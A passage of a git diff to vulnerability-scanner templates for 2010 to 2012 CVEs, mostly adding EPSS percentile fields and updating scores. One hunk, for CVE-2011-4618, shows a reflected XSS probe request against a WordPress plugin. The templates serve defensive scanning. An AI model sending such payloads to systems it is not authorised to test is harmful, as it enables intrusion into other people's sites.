a/http/cves/2010/CVE-2010-2033.yaml +++ b/http/cves/2010/CVE-2010-2033.yaml @@ -8,8 +8,6 @@ info: reference: - https://packetstormsecurity.com/files/89654/Joomla-Percha-Categories-Tree-0.6-Local-File-Inclusion.html - https://nvd.nist.gov/vuln/detail/CVE-2010-2033 - - http://web.archive.org/web/20140805143014/http://secunia.com/advisories/39873/ - - http://web.archive.org/web/20210615115919/https://www.securityfocus.com/bid/40244 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P @@ -18,6 +16,7 @@ info: cwe-id: CWE-22 epss-score: 0.00826 cpe: cpe:2.3:a:percha:com_perchacategoriestree:0.6:*:*:*:*:*:*:* + epss-percentile: 0.79783 metadata: max-request: 1 vendor: percha diff --git a/http/cves/2010/CVE-2010-2034.yaml b/http/cves/2010/CVE-2010-2034.yaml index 14273b3928..c103d239ca 100644 --- a/http/cves/2010/CVE-2010-2034.yaml +++ b/http/cves/2010/CVE-2010-2034.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.00718 cpe: cpe:2.3:a:percha:com_perchaimageattach:1.1:*:*:*:*:*:*:* + epss-percentile: 0.78113 metadata: max-request: 1 vendor: percha diff --git a/http/cves/2010/CVE-2010-2035.yaml b/http/cves/2010/CVE-2010-2035.yaml index d7c6ef1cbd..eb96825282 100644 --- a/http/cves/2010/CVE-2010-2035.yaml +++ b/http/cves/2010/CVE-2010-2035.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.00718 cpe: cpe:2.3:a:percha:com_perchagallery:1.6:beta:*:*:*:*:*:* + epss-percentile: 0.78113 metadata: max-request: 1 vendor: percha diff --git a/http/cves/2010/CVE-2010-2036.yaml b/http/cves/2010/CVE-2010-2036.yaml index 32338a27cf..a92402e547 100644 --- a/http/cves/2010/CVE-2010-2036.yaml +++ b/http/cves/2010/CVE-2010-2036.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.00718 cpe: cpe:2.3:a:percha:com_perchafieldsattach:1.0:*:*:*:*:*:*:* + epss-percentile: 0.78113 metadata: max-request: 1 vendor: percha diff --git a/http/cves/2010/CVE-2010-2037.yaml b/http/cves/2010/CVE-2010-2037.yaml index b08f6315d0..ff9b32ffa6 100644 --- a/http/cves/2010/CVE-2010-2037.yaml +++ b/http/cves/2010/CVE-2010-2037.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.00718 cpe: cpe:2.3:a:percha:com_perchadownloadsattach:1.1:*:*:*:*:*:*:* + epss-percentile: 0.78113 metadata: max-request: 1 vendor: percha diff --git a/http/cves/2010/CVE-2010-2045.yaml b/http/cves/2010/CVE-2010-2045.yaml index afa6643c0f..82c5ba09d4 100644 --- a/http/cves/2010/CVE-2010-2045.yaml +++ b/http/cves/2010/CVE-2010-2045.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.01671 cpe: cpe:2.3:a:dionesoft:com_dioneformwizard:1.0.2:*:*:*:*:*:*:* + epss-percentile: 0.86069 metadata: max-request: 1 vendor: dionesoft diff --git a/http/cves/2010/CVE-2010-2050.yaml b/http/cves/2010/CVE-2010-2050.yaml index 70bf23e240..2c7805e3e4 100644 --- a/http/cves/2010/CVE-2010-2050.yaml +++ b/http/cves/2010/CVE-2010-2050.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-22 epss-score: 0.03527 cpe: cpe:2.3:a:m0r0n:com_mscomment:0.8.0:b:*:*:*:*:*:* + epss-percentile: 0.90353 metadata: max-request: 1 vendor: m0r0n diff --git a/http/cves/2010/CVE-2010-2122.yaml b/http/cves/2010/CVE-2010-2122.yaml index 8034b4f47b..7cc6277ba9 100644 --- a/http/cves/2010/CVE-2010-2122.yaml +++ b/http/cves/2010/CVE-2010-2122.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-22 epss-score: 0.01806 cpe: cpe:2.3:a:joelrowley:com_simpledownload:0.9.5:*:*:*:*:*:*:* + epss-percentile: 0.86643 metadata: max-request: 1 vendor: joelrowley diff --git a/http/cves/2010/CVE-2010-2128.yaml b/http/cves/2010/CVE-2010-2128.yaml index 385ffa3864..c658a8fe83 100644 --- a/http/cves/2010/CVE-2010-2128.yaml +++ b/http/cves/2010/CVE-2010-2128.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.01242 cpe: cpe:2.3:a:harmistechnology:com_jequoteform:1.0:b1:*:*:*:*:*:* + epss-percentile: 0.83796 metadata: max-request: 1 vendor: harmistechnology diff --git a/http/cves/2010/CVE-2010-2259.yaml b/http/cves/2010/CVE-2010-2259.yaml index 9edc715cde..335e4e7f58 100644 --- a/http/cves/2010/CVE-2010-2259.yaml +++ b/http/cves/2010/CVE-2010-2259.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.01671 cpe: cpe:2.3:a:tamlyncreative:com_bfsurvey_profree:1.2.6:*:*:*:*:*:*:* + epss-percentile: 0.86069 metadata: max-request: 1 vendor: tamlyncreative diff --git a/http/cves/2010/CVE-2010-2307.yaml b/http/cves/2010/CVE-2010-2307.yaml index 6a9e361b0e..c7cb85b9c2 100644 --- a/http/cves/2010/CVE-2010-2307.yaml +++ b/http/cves/2010/CVE-2010-2307.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.00832 cpe: cpe:2.3:h:motorola:surfboard_sbv6120e:sbv6x2x-1.0.0.5-scm-02-shpc:*:*:*:*:*:*:* + epss-percentile: 0.7986 metadata: max-request: 1 vendor: motorola diff --git a/http/cves/2010/CVE-2010-2507.yaml b/http/cves/2010/CVE-2010-2507.yaml index 6f99dcfd7e..d06a2801c0 100644 --- a/http/cves/2010/CVE-2010-2507.yaml +++ b/http/cves/2010/CVE-2010-2507.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.01671 cpe: cpe:2.3:a:masselink:com_picasa2gallery:*:*:*:*:*:*:*:* + epss-percentile: 0.86069 metadata: max-request: 1 vendor: masselink diff --git a/http/cves/2010/CVE-2010-2680.yaml b/http/cves/2010/CVE-2010-2680.yaml index 28ffb28449..fbc5620daa 100644 --- a/http/cves/2010/CVE-2010-2680.yaml +++ b/http/cves/2010/CVE-2010-2680.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.00826 cpe: cpe:2.3:a:harmistechnology:com_jesectionfinder:*:*:*:*:*:*:*:* + epss-percentile: 0.79783 metadata: max-request: 1 vendor: harmistechnology diff --git a/http/cves/2010/CVE-2010-2682.yaml b/http/cves/2010/CVE-2010-2682.yaml index 2b194116fe..2f2941a8f3 100644 --- a/http/cves/2010/CVE-2010-2682.yaml +++ b/http/cves/2010/CVE-2010-2682.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-22 epss-score: 0.00826 cpe: cpe:2.3:a:realtyna:com_realtyna:1.0.15:*:*:*:*:*:*:* + epss-percentile: 0.79783 metadata: max-request: 1 vendor: realtyna diff --git a/http/cves/2010/CVE-2010-2857.yaml b/http/cves/2010/CVE-2010-2857.yaml index 1b13e60007..cce491629c 100644 --- a/http/cves/2010/CVE-2010-2857.yaml +++ b/http/cves/2010/CVE-2010-2857.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.00826 cpe: cpe:2.3:a:danieljamesscott:com_music:0.1:-:*:*:*:*:*:* + epss-percentile: 0.79783 metadata: max-request: 1 vendor: danieljamesscott diff --git a/http/cves/2010/CVE-2010-2861.yaml b/http/cves/2010/CVE-2010-2861.yaml index 524e62f948..6d5aa6ab06 100644 --- a/http/cves/2010/CVE-2010-2861.yaml +++ b/http/cves/2010/CVE-2010-2861.yaml @@ -17,8 +17,9 @@ info: cvss-score: 7.5 cve-id: CVE-2010-2861 cwe-id: CWE-22 - epss-score: 0.97295 + epss-score: 0.97321 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* + epss-percentile: 0.99812 metadata: max-request: 1 shodan-query: http.component:"Adobe ColdFusion" diff --git a/http/cves/2010/CVE-2010-2918.yaml b/http/cves/2010/CVE-2010-2918.yaml index 89eabf26a0..1e328aaef9 100644 --- a/http/cves/2010/CVE-2010-2918.yaml +++ b/http/cves/2010/CVE-2010-2918.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-94 epss-score: 0.02847 cpe: cpe:2.3:a:visocrea:com_joomla_visites:1.1:rc2:*:*:*:*:*:* + epss-percentile: 0.89382 metadata: max-request: 1 vendor: visocrea diff --git a/http/cves/2010/CVE-2010-2920.yaml b/http/cves/2010/CVE-2010-2920.yaml index 82f82298e8..f8f9460613 100644 --- a/http/cves/2010/CVE-2010-2920.yaml +++ b/http/cves/2010/CVE-2010-2920.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.03527 cpe: cpe:2.3:a:foobla:com_foobla_suggestions:1.5.1.2:*:*:*:*:*:*:* + epss-percentile: 0.90353 metadata: max-request: 1 vendor: foobla diff --git a/http/cves/2010/CVE-2010-3203.yaml b/http/cves/2010/CVE-2010-3203.yaml index 5680273239..01383e6a55 100644 --- a/http/cves/2010/CVE-2010-3203.yaml +++ b/http/cves/2010/CVE-2010-3203.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.00626 cpe: cpe:2.3:a:xmlswf:com_picsell:1.0:*:*:*:*:*:*:* + epss-percentile: 0.76317 metadata: max-request: 1 vendor: xmlswf diff --git a/http/cves/2010/CVE-2010-3426.yaml b/http/cves/2010/CVE-2010-3426.yaml index 7b0ebdf427..f8ae87ea9a 100644 --- a/http/cves/2010/CVE-2010-3426.yaml +++ b/http/cves/2010/CVE-2010-3426.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-22 epss-score: 0.00826 cpe: cpe:2.3:a:4you-studio:com_jphone:1.0:alpha3:*:*:*:*:*:* + epss-percentile: 0.79783 metadata: max-request: 1 vendor: 4you-studio diff --git a/http/cves/2010/CVE-2010-4231.yaml b/http/cves/2010/CVE-2010-4231.yaml index e7f66b9469..38586f00a8 100644 --- a/http/cves/2010/CVE-2010-4231.yaml +++ b/http/cves/2010/CVE-2010-4231.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.8 cve-id: CVE-2010-4231 cwe-id: CWE-22 - epss-score: 0.00822 + epss-score: 0.01615 cpe: cpe:2.3:a:camtron:cmnc-200_firmware:1.102a-008:*:*:*:*:*:*:* + epss-percentile: 0.85862 metadata: max-request: 1 vendor: camtron diff --git a/http/cves/2010/CVE-2010-4239.yaml b/http/cves/2010/CVE-2010-4239.yaml index 284370fe61..372af6ec0b 100644 --- a/http/cves/2010/CVE-2010-4239.yaml +++ b/http/cves/2010/CVE-2010-4239.yaml @@ -10,13 +10,15 @@ info: - https://www.openwall.com/lists/oss-security/2010/11/22/9 - https://security-tracker.debian.org/tracker/CVE-2010-4239 - https://nvd.nist.gov/vuln/detail/CVE-2010-4239 + - https://access.redhat.com/security/cve/cve-2010-4239 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2010-4239 cwe-id: CWE-20 - epss-score: 0.01809 + epss-score: 0.02543 cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:5.2:*:*:*:*:*:*:* + epss-percentile: 0.88814 metadata: max-request: 1 vendor: tiki diff --git a/http/cves/2010/CVE-2010-4282.yaml b/http/cves/2010/CVE-2010-4282.yaml index 171ea60864..061e6be952 100644 --- a/http/cves/2010/CVE-2010-4282.yaml +++ b/http/cves/2010/CVE-2010-4282.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-22 epss-score: 0.01214 cpe: cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:* + epss-percentile: 0.83541 metadata: max-request: 1 vendor: artica diff --git a/http/cves/2010/CVE-2010-4617.yaml b/http/cves/2010/CVE-2010-4617.yaml index 4b5f13491a..8c54463c0a 100644 --- a/http/cves/2010/CVE-2010-4617.yaml +++ b/http/cves/2010/CVE-2010-4617.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.00938 cpe: cpe:2.3:a:kanich:com_jotloader:2.2.1:*:*:*:*:*:*:* + epss-percentile: 0.81097 metadata: max-request: 1 vendor: kanich diff --git a/http/cves/2010/CVE-2010-4719.yaml b/http/cves/2010/CVE-2010-4719.yaml index 037daf0dce..ceb14fd63a 100644 --- a/http/cves/2010/CVE-2010-4719.yaml +++ b/http/cves/2010/CVE-2010-4719.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-22 epss-score: 0.04503 cpe: cpe:2.3:a:fxwebdesign:com_jradio:*:*:*:*:*:*:*:* + epss-percentile: 0.91406 metadata: max-request: 1 vendor: fxwebdesign diff --git a/http/cves/2010/CVE-2010-4769.yaml b/http/cves/2010/CVE-2010-4769.yaml index 6d78595c9b..723d0c2698 100644 --- a/http/cves/2010/CVE-2010-4769.yaml +++ b/http/cves/2010/CVE-2010-4769.yaml @@ -8,8 +8,6 @@ info: reference: - https://www.exploit-db.com/exploits/15585 - https://nvd.nist.gov/vuln/detail/CVE-2010-4769 - - http://web.archive.org/web/20140803011658/http://secunia.com/advisories/42324/ - - http://web.archive.org/web/20210121210048/https://www.securityfocus.com/bid/44992/ remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P @@ -18,6 +16,7 @@ info: cwe-id: CWE-22 epss-score: 0.00949 cpe: cpe:2.3:a:janguo:com_jimtawl:1.0.2:*:*:*:*:*:*:* + epss-percentile: 0.81213 metadata: max-request: 1 vendor: janguo diff --git a/http/cves/2010/CVE-2010-4977.yaml b/http/cves/2010/CVE-2010-4977.yaml index 87e7ffc844..c789fa5beb 100644 --- a/http/cves/2010/CVE-2010-4977.yaml +++ b/http/cves/2010/CVE-2010-4977.yaml @@ -17,8 +17,9 @@ info: cvss-score: 7.5 cve-id: CVE-2010-4977 cwe-id: CWE-89 - epss-score: 0.00239 + epss-score: 0.00199 cpe: cpe:2.3:a:miniwork:com_canteen:1.0:*:*:*:*:*:*:* + epss-percentile: 0.57091 metadata: max-request: 1 vendor: miniwork diff --git a/http/cves/2010/CVE-2010-5028.yaml b/http/cves/2010/CVE-2010-5028.yaml index 3c600f288a..189aad9643 100644 --- a/http/cves/2010/CVE-2010-5028.yaml +++ b/http/cves/2010/CVE-2010-5028.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.5 cve-id: CVE-2010-5028 cwe-id: CWE-89 - epss-score: 0.01171 + epss-score: 0.01052 cpe: cpe:2.3:a:harmistechnology:com_jejob:1.0:*:*:*:*:*:*:* + epss-percentile: 0.82203 metadata: max-request: 1 vendor: harmistechnology diff --git a/http/cves/2010/CVE-2010-5278.yaml b/http/cves/2010/CVE-2010-5278.yaml index e3bacfe9cb..9cd416d74e 100644 --- a/http/cves/2010/CVE-2010-5278.yaml +++ b/http/cves/2010/CVE-2010-5278.yaml @@ -16,8 +16,9 @@ info: cvss-score: 4.3 cve-id: CVE-2010-5278 cwe-id: CWE-22 - epss-score: 0.0469 + epss-score: 0.04725 cpe: cpe:2.3:a:modx:modx_revolution:*:*:*:*:*:*:*:* + epss-percentile: 0.91601 metadata: max-request: 1 vendor: modx diff --git a/http/cves/2010/CVE-2010-5286.yaml b/http/cves/2010/CVE-2010-5286.yaml index d1f6dac332..f2e1dd1847 100644 --- a/http/cves/2010/CVE-2010-5286.yaml +++ b/http/cves/2010/CVE-2010-5286.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.04708 cpe: cpe:2.3:a:joobi:com_jstore:-:*:*:*:*:*:*:* + epss-percentile: 0.9159 metadata: max-request: 1 vendor: joobi diff --git a/http/cves/2011/CVE-2011-0049.yaml b/http/cves/2011/CVE-2011-0049.yaml index 3a1121c10d..734dfe6c9d 100644 --- a/http/cves/2011/CVE-2011-0049.yaml +++ b/http/cves/2011/CVE-2011-0049.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-22 epss-score: 0.96615 cpe: cpe:2.3:a:mj2:majordomo_2:*:*:*:*:*:*:*:* + epss-percentile: 0.99457 metadata: max-request: 1 vendor: mj2 diff --git a/http/cves/2011/CVE-2011-1669.yaml b/http/cves/2011/CVE-2011-1669.yaml index 14b2c92930..6eecee143f 100644 --- a/http/cves/2011/CVE-2011-1669.yaml +++ b/http/cves/2011/CVE-2011-1669.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.02966 cpe: cpe:2.3:a:mikoviny:wp_custom_pages:0.5.0.1:*:*:*:*:*:*:* + epss-percentile: 0.89572 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/wp-custom-pages/" diff --git a/http/cves/2011/CVE-2011-2744.yaml b/http/cves/2011/CVE-2011-2744.yaml index 1166adb100..e5fdc764c0 100644 --- a/http/cves/2011/CVE-2011-2744.yaml +++ b/http/cves/2011/CVE-2011-2744.yaml @@ -16,8 +16,9 @@ info: cvss-score: 6.8 cve-id: CVE-2011-2744 cwe-id: CWE-22 - epss-score: 0.01913 + epss-score: 0.01541 cpe: cpe:2.3:a:chyrp:chyrp:*:*:*:*:*:*:*:* + epss-percentile: 0.85494 metadata: max-request: 1 vendor: chyrp diff --git a/http/cves/2011/CVE-2011-2780.yaml b/http/cves/2011/CVE-2011-2780.yaml index 277d5450e7..f3d1a3c33b 100644 --- a/http/cves/2011/CVE-2011-2780.yaml +++ b/http/cves/2011/CVE-2011-2780.yaml @@ -18,8 +18,9 @@ info: cvss-score: 5 cve-id: CVE-2011-2780 cwe-id: CWE-22 - epss-score: 0.04076 + epss-score: 0.03327 cpe: cpe:2.3:a:chyrp:chyrp:*:*:*:*:*:*:*:* + epss-percentile: 0.90099 metadata: max-request: 1 vendor: chyrp diff --git a/http/cves/2011/CVE-2011-3315.yaml b/http/cves/2011/CVE-2011-3315.yaml index 8bbde93741..40f8378e09 100644 --- a/http/cves/2011/CVE-2011-3315.yaml +++ b/http/cves/2011/CVE-2011-3315.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.8 cve-id: CVE-2011-3315 cwe-id: CWE-22 - epss-score: 0.92426 + epss-score: 0.90502 cpe: cpe:2.3:h:cisco:unified_ip_interactive_voice_response:-:*:*:*:*:*:*:* + epss-percentile: 0.98414 metadata: max-request: 1 vendor: cisco diff --git a/http/cves/2011/CVE-2011-4336.yaml b/http/cves/2011/CVE-2011-4336.yaml index d2ebe41abd..ff4ccb75d0 100644 --- a/http/cves/2011/CVE-2011-4336.yaml +++ b/http/cves/2011/CVE-2011-4336.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00182 cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:*:*:*:*:*:*:*:* + epss-percentile: 0.54818 metadata: max-request: 1 vendor: tiki diff --git a/http/cves/2011/CVE-2011-4618.yaml b/http/cves/2011/CVE-2011-4618.yaml index 5e75f2940e..17dbb4c941 100644 --- a/http/cves/2011/CVE-2011-4618.yaml +++ b/http/cves/2011/CVE-2011-4618.yaml @@ -17,8 +17,9 @@ info: cvss-score: 4.3 cve-id: CVE-2011-4618 cwe-id: CWE-79 - cpe: cpe:2.3:a:simplerealtytheme:advanced_text_widget_plugin:*:*:*:*:*:*:*:* epss-score: 0.00746 + cpe: cpe:2.3:a:simplerealtytheme:advanced_text_widget_plugin:*:*:*:*:*:*:*:* + epss-percentile: 0.78598 metadata: google-query: inurl:"/wp-content/plugins/advanced-text-widget" max-request: 2 @@ -31,7 +32,6 @@ http: - | GET /wp-content/plugins/advanced-text-widget/readme.txt HTTP/1.1 Host: {{Hostname}} - - | GET /wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2011/CVE-2011-4624.yaml b/http/cves/2011/CVE-2011-4624.yaml index 471638e581..0fd8498e37 100644 --- a/http/cves/2011/CVE-2011-4624.yaml +++ b/http/cves/2011/CVE-2011-4624.yaml @@ -16,8 +16,9 @@ info: cvss-score: 4.3 cve-id: CVE-2011-4624 cwe-id: CWE-79 - epss-score: 0.00427 + epss-score: 0.00301 cpe: cpe:2.3:a:codeasily:grand_flagallery:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.65663 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/flash-album-gallery" diff --git a/http/cves/2011/CVE-2011-4804.yaml b/http/cves/2011/CVE-2011-4804.yaml index 80ffd86ac8..412a1f94a5 100644 --- a/http/cves/2011/CVE-2011-4804.yaml +++ b/http/cves/2011/CVE-2011-4804.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.06953 cpe: cpe:2.3:a:foobla:com_obsuggest:*:*:*:*:*:*:*:* + epss-percentile: 0.93063 metadata: max-request: 1 vendor: foobla diff --git a/http/cves/2011/CVE-2011-4926.yaml b/http/cves/2011/CVE-2011-4926.yaml index 7d3019d37b..6e1ff30c8f 100644 --- a/http/cves/2011/CVE-2011-4926.yaml +++ b/http/cves/2011/CVE-2011-4926.yaml @@ -16,8 +16,9 @@ info: cvss-score: 4.3 cve-id: CVE-2011-4926 cwe-id: CWE-79 - epss-score: 0.0083 + epss-score: 0.01001 cpe: cpe:2.3:a:bueltge:adminimize:*:*:*:*:*:*:*:* + epss-percentile: 0.8173 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/adminimize/" diff --git a/http/cves/2011/CVE-2011-5106.yaml b/http/cves/2011/CVE-2011-5106.yaml index c4bfe1ccc2..07d5a93bb9 100644 --- a/http/cves/2011/CVE-2011-5106.yaml +++ b/http/cves/2011/CVE-2011-5106.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00541 cpe: cpe:2.3:a:fractalia:flexible_custom_post_type:0.1:*:*:*:*:*:*:* + epss-percentile: 0.7437 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/flexible-custom-post-type/" diff --git a/http/cves/2011/CVE-2011-5107.yaml b/http/cves/2011/CVE-2011-5107.yaml index f3cc844eb4..d40037c7fa 100644 --- a/http/cves/2011/CVE-2011-5107.yaml +++ b/http/cves/2011/CVE-2011-5107.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-79 epss-score: 0.0022 cpe: cpe:2.3:a:wordpress:alert_before_you_post:*:*:*:*:*:*:*:* + epss-percentile: 0.59193 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/alert-before-your-post" diff --git a/http/cves/2011/CVE-2011-5179.yaml b/http/cves/2011/CVE-2011-5179.yaml index b05e7b900c..4e157103de 100644 --- a/http/cves/2011/CVE-2011-5179.yaml +++ b/http/cves/2011/CVE-2011-5179.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-79 epss-score: 0.0022 cpe: cpe:2.3:a:skysa:skysa_app_bar_integration_plugin:*:*:*:*:*:*:*:* + epss-percentile: 0.59193 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/skysa-official/" diff --git a/http/cves/2011/CVE-2011-5181.yaml b/http/cves/2011/CVE-2011-5181.yaml index 9d425d5705..cb9d6abcd4 100644 --- a/http/cves/2011/CVE-2011-5181.yaml +++ b/http/cves/2011/CVE-2011-5181.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00326 cpe: cpe:2.3:a:clickdesk:clickdesk_live_support-live_chat_plugin:2.0:*:*:*:*:*:*:* + epss-percentile: 0.67061 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/clickdesk-live-support-chat/" diff --git a/http/cves/2011/CVE-2011-5252.yaml b/http/cves/2011/CVE-2011-5252.yaml index 52d3dd4fa4..9b0df76c73 100644 --- a/http/cves/2011/CVE-2011-5252.yaml +++ b/http/cves/2011/CVE-2011-5252.yaml @@ -17,8 +17,9 @@ info: cvss-score: 5.8 cve-id: CVE-2011-5252 cwe-id: CWE-20 - epss-score: 0.0304 + epss-score: 0.02747 cpe: cpe:2.3:a:orchardproject:orchard:1.0:*:*:*:*:*:*:* + epss-percentile: 0.8922 metadata: max-request: 1 vendor: orchardproject diff --git a/http/cves/2011/CVE-2011-5265.yaml b/http/cves/2011/CVE-2011-5265.yaml index 1d9c89e55e..7e0cce6880 100644 --- a/http/cves/2011/CVE-2011-5265.yaml +++ b/http/cves/2011/CVE-2011-5265.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-79 epss-score: 0.00432 cpe: cpe:2.3:a:featurific_for_wordpress_project:featurific-for-wordpress:1.6.2:*:*:*:*:*:*:* + epss-percentile: 0.71357 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/featurific-for-wordpress" diff --git a/http/cves/2012/CVE-2012-0392.yaml b/http/cves/2012/CVE-2012-0392.yaml index 65aade183b..00a1e82825 100644 --- a/http/cves/2012/CVE-2012-0392.yaml +++ b/http/cves/2012/CVE-2012-0392.yaml @@ -19,6 +19,7 @@ info: cwe-id: NVD-CWE-noinfo epss-score: 0.97059 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* + epss-percentile: 0.99651 metadata: max-request: 1 vendor: apache diff --git a/http/cves/2012/CVE-2012-0394.yaml b/http/cves/2012/CVE-2012-0394.yaml index a6f87cd4be..a54697a174 100644 --- a/http/cves/2012/CVE-2012-0394.yaml +++ b/http/cves/2012/CVE-2012-0394.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-94 epss-score: 0.953 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* + epss-percentile: 0.99071 metadata: max-request: 1 shodan-query: html:"Struts Problem Report" diff --git a/http/cves/2012/CVE-2012-0896.yaml b/http/cves/2012/CVE-2012-0896.yaml index 74aeddee10..61bbd1076e 100644 --- a/http/cves/2012/CVE-2012-0896.yaml +++ b/http/cves/2012/CVE-2012-0896.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.02262 cpe: cpe:2.3:a:count_per_day_project:count_per_day:2.2:*:*:*:*:*:*:* + epss-percentile: 0.88176 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/count-per-day" diff --git a/http/cves/2012/CVE-2012-0901.yaml b/http/cves/2012/CVE-2012-0901.yaml index 9747022681..203a226d6b 100644 --- a/http/cves/2012/CVE-2012-0901.yaml +++ b/http/cves/2012/CVE-2012-0901.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00216 cpe: cpe:2.3:a:attenzione:yousaytoo:1.0:*:*:*:*:*:*:* + epss-percentile: 0.58864 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/yousaytoo-auto-publishing-plugin" diff --git a/http/cves/2012/CVE-2012-0981.yaml b/http/cves/2012/CVE-2012-0981.yaml index 0402f52eb2..ffaf75fc0c 100644 --- a/http/cves/2012/CVE-2012-0981.yaml +++ b/http/cves/2012/CVE-2012-0981.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.05654 cpe: cpe:2.3:a:kybernetika:phpshowtime:2.0:*:*:*:*:*:*:* + epss-percentile: 0.92327 metadata: max-request: 1 vendor: kybernetika diff --git a/http/cves/2012/CVE-2012-0991.yaml b/http/cves/2012/CVE-2012-0991.yaml index 62c4c0e92d..c35c81dd3b 100644 --- a/http/cves/2012/CVE-2012-0991.yaml +++ b/http/cves/2012/CVE-2012-0991.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.89208 cpe: cpe:2.3:a:openemr:openemr:4.1.0:*:*:*:*:*:*:* + epss-percentile: 0.98307 metadata: max-request: 1 vendor: openemr diff --git a/http/cves/2012/CVE-2012-0996.yaml b/http/cves/2012/CVE-2012-0996.yaml index 9a6a2f5af4..10eafa9935 100644 --- a/http/cves/2012/CVE-2012-0996.yaml +++ b/http/cves/2012/CVE-2012-0996.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.01398 cpe: cpe:2.3:a:11in1:11in1:1.2.1:stable_12-31-2011:*:*:*:*:*:* + epss-percentile: 0.84741 metadata: max-request: 1 vendor: 11in1 diff --git a/http/cves/2012/CVE-2012-1226.yaml b/http/cves/2012/CVE-2012-1226.yaml index 34f2e69e0d..022ce152a6 100644 --- a/http/cves/2012/CVE-2012-1226.yaml +++ b/http/cves/2012/CVE-2012-1226.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-22 epss-score: 0.10469 cpe: cpe:2.3:a:dolibarr:dolibarr_erp\/crm:3.2.0:alpha:*:*:*:*:*:* + epss-percentile: 0.94257 metadata: max-request: 1 vendor: dolibarr diff --git a/http/cves/2012/CVE-2012-1823.yaml b/http/cves/2012/CVE-2012-1823.yaml index 2ca989ea68..366fd1e660 100644 --- a/http/cves/2012/CVE-2012-1823.yaml +++ b/http/cves/2012/CVE-2012-1823.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-20 epss-score: 0.97494 cpe: cpe:2.3:a:php:php:*:*:*:*:*:*:*:* + epss-percentile: 0.99959 metadata: max-request: 1 vendor: php diff --git a/http/cves/2012/CVE-2012-1835.yaml b/http/cves/2012/CVE-2012-1835.yaml index c1e5c44ee1..79d88e86ef 100644 --- a/http/cves/2012/CVE-2012-1835.yaml +++ b/http/cves/2012/CVE-2012-1835.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00229 cpe: cpe:2.3:a:timely:all-in-one_event_calendar:1.4:*:*:*:*:*:*:* + epss-percentile: 0.60385 metadata: max-request: 1 google-query: 